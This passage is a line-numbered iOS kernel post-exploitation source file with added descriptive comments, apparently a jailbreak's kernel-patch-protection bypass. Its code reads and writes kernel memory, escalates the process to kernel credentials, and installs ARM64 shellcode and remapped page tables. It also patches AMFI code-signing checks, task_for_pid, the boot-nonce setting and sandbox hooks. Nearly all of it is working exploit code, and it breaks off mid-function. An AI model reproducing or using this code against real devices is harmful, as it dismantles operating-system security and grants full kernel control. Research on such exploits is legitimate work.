// tfp0: the task port passed as target to every mach_vm_* call in this file.
// exploit() sets it from its `pt` argument. The name suggests the kernel task
// port; a process holding that port can read and write kernel memory, which
// is why stock iOS does not hand it to apps.
34 | mach_port_t tfp0=0;
// slide: added to the kernel entry point inside exploit(). Nothing visible in
// this file assigns it after the 0 initialiser - presumably set elsewhere.
35 | uint64_t slide=0;
// funcconn: IOKit connection that exploit() opens on the first service
// matching "IOSurfaceRoot"; FuncAnywhere32() passes it to IOConnectTrap4.
36 | io_connect_t funcconn=0;
37 | // #define NSLog(...)
// Local prototypes for the mach_vm_* calls used below.
38 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
39 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
40 | kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);
41 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
42 |
/*
 * Issues IOConnectTrap4 on the global `funcconn` connection with trap
 * index 0 and returns its result.
 *
 * The arguments are forwarded in the order x1, x2, x0, addr, not in the
 * order of the parameter list. What the trap does with them depends on
 * state prepared outside this function and is not visible here.
 */
43 | uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2)
44 | {
45 |     return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr);
46 | }
47 |
/*
 * Copies `size` bytes from address `from` in the task behind `tfp0` into
 * the local buffer `to`.
 *
 * The copy is made in pieces of at most 0x1000 bytes, one
 * mach_vm_read_overwrite call per piece. Neither the return value nor
 * `outsize` is checked, so a failed or short read goes unnoticed and the
 * affected part of `to` keeps its previous contents.
 */
48 | void copyin(void* to, uint64_t from, size_t size) {
49 |     mach_vm_size_t outsize = size;
// szt: bytes still to copy; size: length of the current piece.
50 |     size_t szt = size;
51 |     if (size > 0x1000) {
52 |         size = 0x1000;
53 |     }
54 |     size_t off = 0;
55 |     while (1) {
// off+to is arithmetic on a void pointer, which relies on a compiler extension.
56 |         mach_vm_read_overwrite(tfp0, off+from, size, (mach_vm_offset_t)(off+to), &outsize);
57 |         szt -= size;
58 |         off += size;
59 |         if (szt == 0) {
60 |             break;
61 |         }
62 |         size = szt;
63 |         if (size > 0x1000) {
64 |             size = 0x1000;
65 |         }
66 |
67 |     }
68 | }
69 |
/*
 * Writes `size` bytes from the local buffer `from` to address `to` in the
 * task behind `tfp0`, using a single mach_vm_write call.
 *
 * Unlike copyin() the transfer is not split into pieces, and `size` is
 * narrowed to mach_msg_type_number_t. The return value is ignored, so the
 * caller cannot tell whether the write took place.
 */
70 | void copyout(uint64_t to, void* from, size_t size) {
71 |     mach_vm_write(tfp0, to, (vm_offset_t)from, (mach_msg_type_number_t)size);
72 | }
73 |
/*
 * Reads 8 bytes at `addr` through copyin() and returns them as a uint64_t.
 * `val` starts at 0, so a read that stores nothing returns 0, which is
 * indistinguishable from a stored zero.
 */
74 | uint64_t ReadAnywhere64(uint64_t addr) {
75 |     uint64_t val = 0;
76 |     copyin(&val, addr, 8);
77 |     return val;
78 | }
79 |
/*
 * Writes the 8-byte value `val` at `addr` through copyout().
 * Returns `val` unchanged, whether or not the write succeeded.
 */
80 | uint64_t WriteAnywhere64(uint64_t addr, uint64_t val) {
81 |     copyout(addr, &val, 8);
82 |     return val;
83 | }
84 |
/*
 * Reads 4 bytes at `addr` through copyin() and returns them as a uint32_t.
 * As with ReadAnywhere64(), a read that stores nothing returns 0.
 */
85 | uint32_t ReadAnywhere32(uint64_t addr) {
86 |     uint32_t val = 0;
87 |     copyin(&val, addr, 4);
88 |     return val;
89 | }
90 |
/*
 * Writes the 4-byte value `val` at `addr` through copyout().
 * Returns `val` widened to uint64_t, whether or not the write succeeded.
 */
91 | uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) {
92 |     copyout(addr, &val, 4);
93 |     return val;
94 | }
95 |
// pte_stuff.h is imported here, after the helpers above are defined -
// presumably because it uses them; the header is not part of this listing.
96 | #import "pte_stuff.h"
97 |
98 | void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs)
99 | {
100 |     io_iterator_t iterator;
101 |
IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); 102 | io_object_t servicex = IOIteratorNext(iterator); 103 | funcconn = 0; 104 | IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); 105 | assert(funcconn); 106 | 107 | tfp0 = pt; 108 | 109 | uint64_t bsd_task=0; 110 | uint64_t launchd_task = 0; 111 | { 112 | uint64_t proc = ReadAnywhere64(allprocs+kernbase); 113 | NSLog(@"found procs at %llx", proc); 114 | while (proc) { 115 | uint32_t pid = ReadAnywhere32(proc+0x10); 116 | if (pid == getpid()) { 117 | bsd_task = proc; 118 | } else 119 | if (pid == 1) { 120 | launchd_task = proc; 121 | } 122 | 123 | if (launchd_task && bsd_task) break; 124 | 125 | proc = ReadAnywhere64(proc); 126 | } 127 | } 128 | uint64_t cred = ReadAnywhere64(bsd_task+0x100); 129 | 130 | uint64_t credpatch = 0; 131 | uint64_t proc = bsd_task; 132 | while (proc) { 133 | uint32_t pid = ReadAnywhere32(proc+0x10); 134 | uint32_t csflags = ReadAnywhere32(proc+0x2a8); 135 | csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW; 136 | csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD); 137 | WriteAnywhere32(proc+0x2a8, csflags); 138 | if (pid == 0) { 139 | credpatch = ReadAnywhere64(proc+0x100); 140 | break; 141 | } 142 | proc = ReadAnywhere64(proc); 143 | } 144 | 145 | uint64_t orig_cred = cred; 146 | 147 | WriteAnywhere64(bsd_task+0x100, credpatch); 148 | 149 | checkvad(); 150 | 151 | vm_address_t vmd = 0; 152 | _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE); 153 | 154 | copyin((void*)vmd, kernbase, 0x4000); 155 | 156 | struct mach_header_64* vmk = vmd; 157 | uint64_t max = 0; 158 | uint64_t min = -1; 159 | 160 | struct load_command* lc = vmk+1; 161 | for (int k=0; k < vmk->ncmds; k++) { 162 | 163 | if (lc->cmd == LC_SEGMENT_64) { 164 | struct segment_command_64* sg = lc; 165 | NSLog(@"seg: %s", sg->segname); 166 | if (sg->vmaddr < min) { 167 | min = sg->vmaddr; 168 | } 169 | if (sg->vmaddr + sg->vmsize > max) { 
170 | max = sg->vmaddr+sg->vmsize; 171 | } 172 | } 173 | 174 | lc = ((char*)lc) + lc->cmdsize; 175 | } 176 | 177 | NSLog(@"%llx - %llx", min, max); 178 | 179 | char* kdump = malloc(max-min); 180 | 181 | for (int k=0; k < (max-min)/0x4000; k++) { 182 | copyin(kdump+k*0x4000, min+k*0x4000, 0x4000); 183 | } 184 | 185 | NSLog(@"%llx", kdump); 186 | uint64_t kerndumpsize = 0; 187 | uint64_t gadget_base = 0; 188 | uint64_t gadget_size = 0; 189 | uint64_t prelink_base = 0; 190 | uint64_t prelink_size = 0; 191 | uint64_t kerndumpbase = -1; 192 | 193 | 194 | struct mach_header_64* mh_kern = (struct mach_header_64*) (kdump+kernbase-min); 195 | struct load_command* load_cmd = (struct load_command*)(mh_kern+1); 196 | 197 | uint64_t entryp = 0; 198 | 199 | for (int i = 0; i < mh_kern->ncmds; i++) { 200 | 201 | if (load_cmd->cmd == LC_SEGMENT_64) { 202 | struct segment_command_64* seg = (struct segment_command_64*)load_cmd; 203 | //NSLog(@"found segment %s", seg->segname); 204 | 205 | if (strcmp(seg->segname, "__TEXT_EXEC") == 0) { 206 | gadget_base = seg->vmaddr; 207 | gadget_size = seg->filesize; 208 | } 209 | if (strcmp(seg->segname, "__PLK_TEXT_EXEC") == 0) { 210 | prelink_base = seg->vmaddr; 211 | prelink_size = seg->filesize; 212 | } 213 | 214 | if (seg->vmaddr < kerndumpbase) { 215 | kerndumpbase = seg->vmaddr; 216 | } 217 | kerndumpsize += seg->vmsize; 218 | } else if (load_cmd->cmd == LC_UNIXTHREAD) { 219 | struct { 220 | unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ 221 | unsigned long cmdsize; /* total size of this command */ 222 | unsigned long flavor; /* flavor of thread state */ 223 | unsigned long count; /* count of longs in thread state */ 224 | struct { 225 | __uint64_t __x[29]; /* General purpose registers x0-x28 */ 226 | __uint64_t __fp; /* Frame pointer x29 */ 227 | __uint64_t __lr; /* Link register x30 */ 228 | __uint64_t __sp; /* Stack pointer x31 */ 229 | __uint64_t __pc; /* Program counter */ 230 | __uint32_t __cpsr; /* Current program status 
register */ 231 | __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */ 232 | } state; 233 | } * thr = load_cmd; 234 | entryp = thr->state.__pc; 235 | } 236 | 237 | load_cmd = (struct load_command*)(load_cmd->cmdsize + (vm_address_t)(load_cmd)); 238 | } 239 | set_dump(kerndumpbase, kerndumpsize, (uint8_t*)kdump); 240 | set_text_exec(gadget_base, gadget_size); 241 | set_prelink_exec(prelink_base, prelink_size); 242 | 243 | uint64_t gStoreBase = find_gPhysBase(); 244 | 245 | gPhysBase = ReadAnywhere64(gStoreBase); 246 | gVirtBase = ReadAnywhere64(gStoreBase+8); 247 | 248 | entryp += slide; 249 | uint64_t rvbar = entryp & (~0xFFF); 250 | 251 | uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1); 252 | 253 | uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20); 254 | if (uref) { 255 | optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase; 256 | } 257 | NSLog(@"%llx", optr); 258 | 259 | uint64_t cpu_list = ReadAnywhere64(cpul - 0x10 /*the add 0x10, 0x10 instruction confuses findregval*/) - gPhysBase + gVirtBase; 260 | uint64_t cpu = ReadAnywhere64(cpu_list); 261 | 262 | uint64_t pmap_store = find_kernel_pmap(); 263 | NSLog(@"pmap: %llx", pmap_store); 264 | level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); 265 | 266 | 267 | 268 | 269 | uint64_t shellcode = physalloc(0x4000); 270 | 271 | /* 272 | ldr x30, a 273 | ldr x0, b 274 | br x0 275 | nop 276 | a: 277 | .quad 0 278 | b: 279 | .quad 0 280 | none of that squad shit tho, straight gang shit. 
free rondonumbanine 281 | */ 282 | 283 | WriteAnywhere32(shellcode + 0x100, 0x5800009e); /* trampoline for idlesleep */ 284 | WriteAnywhere32(shellcode + 0x100 + 4, 0x580000a0); 285 | WriteAnywhere32(shellcode + 0x100 + 8, 0xd61f0000); 286 | 287 | WriteAnywhere32(shellcode + 0x200, 0x5800009e); /* trampoline for deepsleep */ 288 | WriteAnywhere32(shellcode + 0x200 + 4, 0x580000a0); 289 | WriteAnywhere32(shellcode + 0x200 + 8, 0xd61f0000); 290 | 291 | char buf[0x100]; 292 | copyin(buf, optr, 0x100); 293 | copyout(shellcode+0x300, buf, 0x100); 294 | 295 | uint64_t physcode = findphys_real(shellcode); 296 | 297 | 298 | 299 | NSLog(@"got phys at %llx for virt %llx", physcode, shellcode); 300 | 301 | uint64_t idlesleep_handler = 0; 302 | 303 | uint64_t plist[12]={0,0,0,0,0,0,0,0,0,0,0,0}; 304 | int z = 0; 305 | 306 | int idx = 0; 307 | int ridx = 0; 308 | while (cpu) { 309 | cpu = cpu - gPhysBase + gVirtBase; 310 | if ((ReadAnywhere64(cpu+0x130) & 0x3FFF) == 0x100) { 311 | NSLog(@"already jailbroken, bailing out"); 312 | return; 313 | } 314 | 315 | 316 | if (!idlesleep_handler) { 317 | WriteAnywhere64(shellcode + 0x100 + 0x18, ReadAnywhere64(cpu+0x130)); // idlehandler 318 | WriteAnywhere64(shellcode + 0x200 + 0x18, ReadAnywhere64(cpu+0x130) + 12); // deephandler 319 | 320 | idlesleep_handler = ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase; 321 | 322 | 323 | uint32_t* opcz = malloc(0x1000); 324 | copyin(opcz, idlesleep_handler, 0x1000); 325 | idx = 0; 326 | while (1) { 327 | if (opcz[idx] == 0xd61f0000 /* br x0 */) { 328 | break; 329 | } 330 | idx++; 331 | } 332 | ridx = idx; 333 | while (1) { 334 | if (opcz[ridx] == 0xd65f03c0 /* ret */) { 335 | break; 336 | } 337 | ridx++; 338 | } 339 | 340 | 341 | } 342 | 343 | NSLog(@"found cpu %x", ReadAnywhere32(cpu+0x330)); 344 | NSLog(@"found physz: %llx", ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase); 345 | 346 | plist[z++] = cpu+0x130; 347 | cpu_list += 0x10; 348 | cpu = ReadAnywhere64(cpu_list); 349 | } 350 | 351 | 
352 | uint64_t shc = physalloc(0x4000); 353 | 354 | uint64_t regi = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+12-gadget_base, text_exec_base, 30); 355 | uint64_t regd = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+24-gadget_base, text_exec_base, 30); 356 | 357 | NSLog(@"%llx - %llx", regi, regd); 358 | 359 | for (int i = 0; i < 0x500/4; i++) { 360 | WriteAnywhere32(shc+i*4, 0xd503201f); 361 | } 362 | 363 | /* 364 | isvad 0 == 0x4000 365 | */ 366 | 367 | uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000); 368 | 369 | uint64_t ttbr0_real = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler + idx*4 - gadget_base + 24, text_exec_base, 1); 370 | 371 | NSLog(@"ttbr0: %llx %llx",ReadAnywhere64(ttbr0_real), ttbr0_real); 372 | 373 | char* bbuf = malloc(0x4000); 374 | copyin(bbuf, ReadAnywhere64(ttbr0_real) - gPhysBase + gVirtBase, isvad == 0 ? 0x4000 : 0x1000); 375 | copyout(level0_pte, bbuf, isvad == 0 ? 
0x4000 : 0x1000); 376 | 377 | uint64_t physp = findphys_real(level0_pte); 378 | 379 | 380 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 381 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 382 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 383 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 384 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 385 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 386 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 387 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 388 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 389 | WriteAnywhere64(shc+40, regi); 390 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 391 | 392 | shc+=0x100; 393 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 394 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 395 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 396 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 397 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 398 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 399 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 400 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 401 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 402 | WriteAnywhere64(shc+40, regd); /*handle deepsleep*/ 403 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 404 | shc-=0x100; 405 | { 406 | int n = 0; 407 | WriteAnywhere32(shc+0x200+n, 0x18000148); n+=4; // ldr w8, 0x28 408 | WriteAnywhere32(shc+0x200+n, 0xb90002e8); n+=4; // str w8, [x23] 409 | WriteAnywhere32(shc+0x200+n, 0xaa1f03e0); n+=4; // mov x0, xzr 410 | WriteAnywhere32(shc+0x200+n, 0xd10103bf); n+=4; // sub sp, x29, #64 411 | WriteAnywhere32(shc+0x200+n, 0xa9447bfd); n+=4; // ldp x29, x30, [sp, #64] 412 | WriteAnywhere32(shc+0x200+n, 0xa9434ff4); n+=4; // ldp x20, x19, [sp, #48] 413 | WriteAnywhere32(shc+0x200+n, 0xa94257f6); n+=4; // ldp x22, x21, [sp, #32] 414 | WriteAnywhere32(shc+0x200+n, 0xa9415ff8); n+=4; // ldp x24, x23, [sp, #16] 415 | WriteAnywhere32(shc+0x200+n, 0xa8c567fa); 
n+=4; // ldp x26, x25, [sp], #80 416 | WriteAnywhere32(shc+0x200+n, 0xd65f03c0); n+=4; // ret 417 | WriteAnywhere32(shc+0x200+n, 0x0e00400f); n+=4; // tbl.8b v15, { v0, v1, v2 }, v0 418 | 419 | } 420 | 421 | mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 422 | 423 | vm_address_t kppsh = 0; 424 | mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE); 425 | { 426 | int n = 0; 427 | 428 | WriteAnywhere32(kppsh+n, 0x580001e1); n+=4; // ldr x1, #60 429 | WriteAnywhere32(kppsh+n, 0x58000140); n+=4; // ldr x0, #40 430 | WriteAnywhere32(kppsh+n, 0xd5182020); n+=4; // msr TTBR1_EL1, x0 431 | WriteAnywhere32(kppsh+n, 0xd2a00600); n+=4; // movz x0, #0x30, lsl #16 432 | WriteAnywhere32(kppsh+n, 0xd5181040); n+=4; // msr CPACR_EL1, x0 433 | WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 434 | WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 435 | WriteAnywhere32(kppsh+n, isvad ? 0xd5033b9f : 0xd503201f); n+=4; // dsb ish (4k) / nop (16k) 436 | WriteAnywhere32(kppsh+n, isvad ? 
0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k) 437 | WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb 438 | WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret 439 | WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; 440 | WriteAnywhere64(kppsh+n, physp); n+=8; 441 | WriteAnywhere64(kppsh+n, physp); n+=8; 442 | } 443 | 444 | mach_vm_protect(tfp0, kppsh, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 445 | 446 | WriteAnywhere64(shellcode + 0x100 + 0x10, shc - gVirtBase + gPhysBase); // idle 447 | WriteAnywhere64(shellcode + 0x200 + 0x10, shc + 0x100 - gVirtBase + gPhysBase); // idle 448 | 449 | WriteAnywhere64(shellcode + 0x100 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // idlehandler 450 | WriteAnywhere64(shellcode + 0x200 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // deephandler 451 | 452 | /* 453 | 454 | pagetables are now not real anymore, they're real af 455 | 456 | */ 457 | 458 | int cpacr_idx = 0; 459 | uint32_t* opps = gadget_base - min + kdump; 460 | 461 | while (1) { 462 | if (opps[cpacr_idx] == 0xd5181040) { 463 | NSLog(@"got a cpacr"); 464 | break; 465 | } 466 | cpacr_idx++; 467 | } 468 | #define PSZ (isvad ? 
0x1000 : 0x4000) 469 | #define PMK (PSZ-1) 470 | 471 | 472 | #define RemapPage_(address) \ 473 | pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\ 474 | uint64_t tte = ReadAnywhere64(tte_addr);\ 475 | if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\ 476 | NSLog(@"breakup!");\ 477 | uint64_t fakep = physalloc(PSZ);\ 478 | uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\ 479 | TTE_SETB(tte, TTE_IS_TABLE_MASK);\ 480 | for (int i = 0; i < PSZ/8; i++) {\ 481 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\ 482 | WriteAnywhere64(fakep+i*8, tte);\ 483 | }\ 484 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\ 485 | WriteAnywhere64(tte_addr, tte);\ 486 | }\ 487 | uint64_t newt = physalloc(PSZ);\ 488 | copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\ 489 | copyout(newt, bbuf, PSZ);\ 490 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\ 491 | TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\ 492 | TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ 493 | WriteAnywhere64(tte_addr, tte);\ 494 | }, level1_table, isvad ? 
1 : 2); 495 | 496 | #define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) 497 | 498 | uint64_t* remappage = calloc(512, 8); 499 | 500 | int remapcnt = 0; 501 | 502 | 503 | #define RemapPage(x)\ 504 | {\ 505 | int fail = 0;\ 506 | for (int i = 0; i < remapcnt; i++) {\ 507 | if (remappage[i] == (x & (~PMK))) {\ 508 | fail = 1;\ 509 | }\ 510 | }\ 511 | if (fail == 0) {\ 512 | RemapPage_(x);\ 513 | RemapPage_(x+PSZ);\ 514 | remappage[remapcnt++] = (x & (~PMK));\ 515 | }\ 516 | } 517 | 518 | level1_table = physp - gPhysBase + gVirtBase; 519 | WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); 520 | 521 | 522 | uint64_t shtramp = kernbase + mh_kern->sizeofcmds + sizeof(struct mach_header_64); 523 | RemapPage(gadget_base + cpacr_idx*4); 524 | WriteAnywhere32(NewPointer(gadget_base + cpacr_idx*4), 0x94000000 | (((shtramp - (gadget_base+cpacr_idx*4))/4) & 0x3FFFFFF)); 525 | 526 | RemapPage(shtramp); 527 | WriteAnywhere32(NewPointer(shtramp), 0x58000041); 528 | WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020); 529 | WriteAnywhere64(NewPointer(shtramp)+8, kppsh); 530 | 531 | uint64_t lwvm_write = find_lwvm_mapio_patch(); 532 | uint64_t lwvm_value = find_lwvm_mapio_newj(); 533 | RemapPage(lwvm_write); 534 | WriteAnywhere64(NewPointer(lwvm_write), lwvm_value); 535 | 536 | 537 | uint64_t kernvers = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "Darwin Kernel Version", strlen("Darwin Kernel Version")) - whole_dump; 538 | uint64_t release = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "RELEASE_ARM", strlen("RELEASE_ARM")) - whole_dump; 539 | 540 | RemapPage(kernvers+whole_base-4); 541 | WriteAnywhere32(NewPointer(kernvers+whole_base-4), 1); 542 | 543 | RemapPage(release+whole_base); 544 | if (NewPointer(release+whole_base) == (NewPointer(release+whole_base+11) - 11)) { 545 | copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */ 546 | } 547 | 548 | 549 | /* 550 | tfp0 and patch this bug 551 | */ 552 
| { 553 | uint64_t endf = prelink_base+prelink_size; 554 | uint64_t ends = whole_size - (endf - whole_base); 555 | uint32_t* opps_stream = whole_dump + endf - whole_base; 556 | uint64_t* ptr_stream = whole_dump + endf - whole_base; 557 | 558 | uint64_t lastk = 0; 559 | int streak = 0; 560 | 561 | for (int i = 0; i < ends/8; i++) { 562 | uint64_t offp = ptr_stream[i]; 563 | if (endf < offp && offp < endf+ends) { 564 | offp -= endf; 565 | offp /= 4; 566 | if (ptr_stream[i+1] == 0 && ptr_stream[i+2] == 0) { 567 | if (opps_stream[offp] == 0x321e03e0 && opps_stream[offp+1] == 0xd65f03c0) { 568 | if (lastk+streak*0x20 == i*8 - 0x20) { 569 | streak++; 570 | if (streak == 9) { 571 | break; 572 | } 573 | } else { 574 | streak=0; 575 | lastk = i*8; 576 | } 577 | } 578 | } 579 | } 580 | } 581 | 582 | 583 | if (streak == 9) { 584 | 585 | 586 | char* sbstr = whole_dump + lastk + endf - whole_base - 8; 587 | 588 | uint64_t extract_attr_recipe = *(uint64_t*)(sbstr + 72 * 0x20 + 8 /*fptr*/); 589 | 590 | uint32_t* opcode_stream = extract_attr_recipe - whole_base + whole_dump; 591 | 592 | int l = 0; 593 | while (1) { 594 | if ((opcode_stream[l] & 0xFFFFFC00) == 0x7103FC00) { // find cmp wX, 0xFF 595 | int cbz = l; 596 | while (1) { 597 | if ((opcode_stream[cbz] & 0xFF000000) == 0xB4000000) { 598 | break; 599 | } 600 | cbz--; 601 | } 602 | 603 | uint64_t ret_target = (opcode_stream[cbz] & 0xFFFFE0) >> 5; 604 | ret_target += cbz; 605 | 606 | 607 | int bhi = l; 608 | while (1) { 609 | if ((opcode_stream[bhi] & 0xFF000000) == 0x54000000) { 610 | break; 611 | } 612 | bhi++; 613 | } 614 | 615 | ret_target -= bhi; 616 | 617 | uint32_t new_opcode = opcode_stream[bhi] & (~0xFFFFE0); 618 | new_opcode |= (ret_target << 5) & 0xFFFFE0; 619 | 620 | RemapPage(extract_attr_recipe + bhi*4); 621 | WriteAnywhere32(NewPointer(extract_attr_recipe+bhi*4), new_opcode); 622 | 623 | break; 624 | } 625 | l++; 626 | } 627 | 628 | uint64_t tfp = *(uint64_t*)(sbstr + 45 * 0x20 + 8 /*fptr*/); 629 | 630 | 
opcode_stream = tfp - whole_base + whole_dump; 631 | 632 | int cbz = 0; 633 | while (1) { 634 | if ((opcode_stream[cbz] & 0xFF000000) == 0x34000000) { 635 | break; 636 | } 637 | cbz++; 638 | } 639 | 640 | RemapPage(tfp + cbz*4); 641 | WriteAnywhere32(NewPointer(tfp+cbz*4), 0xd503201f); 642 | } 643 | 644 | } 645 | /* 646 | nonceenabler 647 | */ 648 | 649 | { 650 | uint64_t endf = prelink_base+prelink_size; 651 | uint64_t ends = whole_size - (endf - whole_base); 652 | char* sbstr = memmem(whole_dump + endf - whole_base, ends, "com.apple.System.boot-nonce", strlen("com.apple.System.boot-nonce")); 653 | 654 | if (sbstr) { 655 | 656 | for (int i = 0; i < whole_size/8; i++) { 657 | if (*(uint64_t*)(whole_dump+i*8) == (sbstr - (uint64_t)whole_dump + whole_base)) { 658 | NSLog(@"%x", ReadAnywhere32(whole_base+i*8+8+4)); 659 | 660 | WriteAnywhere32(whole_base+i*8+8+4, 1); 661 | } 662 | } 663 | } 664 | } 665 | 666 | 667 | 668 | uint64_t memcmp_got = find_amfi_memcmpstub(); 669 | uint64_t ret1 = find_ret_0(); 670 | 671 | RemapPage(memcmp_got); 672 | WriteAnywhere64(NewPointer(memcmp_got), ret1); 673 | 674 | uint64_t fref = find_reference((uint32_t*)get_data_for_mode(0, SearchTextExec), text_exec_size, text_exec_base, idlesleep_handler+0xC) + text_exec_base; 675 | NSLog(@"fref at %llx", fref); 676 | 677 | uint64_t find_string_reference(char* string, enum Search mode); 678 | uint64_t amfiops = 0; 679 | //= find_string_reference("Apple Mobile File Integrity", SearchPrelinkExec); 680 | char* sbstr = memmem(whole_dump, whole_size, "Apple Mobile File Integrity", strlen("Apple Mobile File Integrity")); 681 | for (int i = 0; i < whole_size/8; i++) { 682 | if (*(uint64_t*)(whole_dump+i*8) == (sbstr - (uint64_t)whole_dump + whole_base)) { 683 | amfiops = *(uint64_t*)(whole_dump+i*8+0x18); 684 | break; 685 | } 686 | } 687 | 688 | NSLog(@"amfistr at %llx", amfiops); 689 | 690 | 691 | { 692 | /* 693 | amfi 694 | */ 695 | 696 | uint64_t sbops = amfiops; 697 | uint64_t sbops_end = sbops + 
sizeof(struct mac_policy_ops); 698 | 699 | uint64_t nopag = sbops_end - sbops; 700 | 701 | for (int i = 0; i < nopag; i+= PSZ) { 702 | RemapPage(((sbops + i) & (~PMK))); 703 | } 704 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 705 | } 706 | 707 | 708 | /* 709 | first str 710 | */ 711 | while (1) { 712 | uint32_t opcode = ReadAnywhere32(fref); 713 | if ((opcode & 0xFFC00000) == 0xF9000000) { 714 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 715 | int32_t myreg = (opcode >> 5) & 0x1f; 716 | uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere; 717 | 718 | WriteAnywhere64(rgz, physcode+0x200); 719 | break; 720 | } 721 | fref += 4; 722 | } 723 | 724 | fref += 4; 725 | 726 | /* 727 | second str 728 | */ 729 | while (1) { 730 | uint32_t opcode = ReadAnywhere32(fref); 731 | if ((opcode & 0xFFC00000) == 0xF9000000) { 732 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 733 | int32_t myreg = (opcode >> 5) & 0x1f; 734 | uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere; 735 | 736 | WriteAnywhere64(rgz, physcode+0x100); 737 | break; 738 | } 739 | fref += 4; 740 | } 741 | 742 | { 743 | /* 744 | sandbox 745 | */ 746 | 747 | uint64_t sbops = find_sbops(); 748 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; 749 | 750 | uint64_t nopag = (sbops_end - sbops)/(PSZ); 751 | 752 | for (int i = 0; i < nopag; i++) { 753 | RemapPage(((sbops + i*(PSZ)) & (~PMK))); 754 | } 755 | 756 | 